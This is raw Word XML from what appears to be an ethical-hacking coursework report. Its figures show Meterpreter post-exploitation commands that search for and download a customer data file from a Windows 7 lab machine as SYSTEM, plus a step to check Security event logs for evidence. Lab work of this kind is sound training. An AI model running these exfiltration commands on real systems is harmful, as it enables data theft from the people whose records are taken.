    <w:p w14:paraId="22473504" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 19 — Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exfiltrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C99D4B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali (Meterpreter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A3FA9E" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A session as NT AUTHORITY\SYSTEM and the file downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD27E54" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38452AF7" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="508E2663" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="786389F0" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DAFC48F" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B146BE6" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>search -f customers.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597C6178" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>download "C:\\CustomerData\\customers.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B42FCF" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">If no session forms, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">run  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  again; if needed, disable the Win7 firewall for the test and note it as an assumption.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="07761E2B" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="029ACB4E" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20D215BA" wp14:editId="36984C40">
                  <wp:extent cx="5588000" cy="3157220"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="204" name="Fig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9"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3157220"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59701F41" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D6BE3F6" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 20 — Windows log proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F151960" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Windows 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177B5CE2" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A logon / object-access event (ID 4624 / 4663) created by the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A6F7E1" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>Open  Event</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">Viewer  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">  Windows </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">Logs  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">  Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A807245" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Screenshot a 4624 (logon) or 4663 (object access) event generated during the attack.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="7FE5BFD1" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CAC7A88" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BB1F843" wp14:editId="458DE0FB">
                  <wp:extent cx="5588000" cy="3492500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="205" name="Fig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30"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3492500"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BFCC46A" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5161951A" w14:textId="77777777" w:rsidR="000D5066" w:rsidRPr="00796916" w:rsidRDefault="000D5066" w:rsidP="00BD02D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000D5066" w:rsidRPr="00796916">
      <w:footerReference w:type="default" r:id="rId31"/>
      <w:pgSz w:w="12240" w:h="15840"/>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C27E37" w14:textId="77777777" w:rsidR="00246B3A" w:rsidRDefault="00246B3A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="397658E9" w14:textId="77777777" w:rsidR="00246B3A" w:rsidRDefault="00246B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84AD35" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">ACCA7033 Ethical Hacking · Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00E443CF">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00E443CF">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>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AB27E2" w14:textId="77777777" w:rsidR="00246B3A" w:rsidRDefault="00246B3A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="102C8177" w14:textId="77777777" w:rsidR="00246B3A" w:rsidRDefault="00246B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9C7D42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F8E65B4"/>
    <w:lvl w:ilvl="0" w:tplc="146CE9CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0E12295C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="209C84EC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="EF622448">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4BF2D812">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D536113C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="66564910">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="68C26508">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="46E40FAA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2B743357"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C94031C"/>
    <w:lvl w:ilvl="0" w:tplc="8FA06A4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7276A190">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="BE881728">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BFA01480">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DBA62F1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="97062E92">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FDC046B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9EEE88DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="98F68EA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="31E25C5E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="824C3D70"/>
    <w:lvl w:ilvl="0" w:tplc="896C9E3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="18"/>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33575165"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E72AE7BC"/>
    <w:lvl w:ilvl="0" w:tplc="F8A22B64">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="18"/>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61053959"/>
    <w:multiLevelType w:val="multilevel"/>
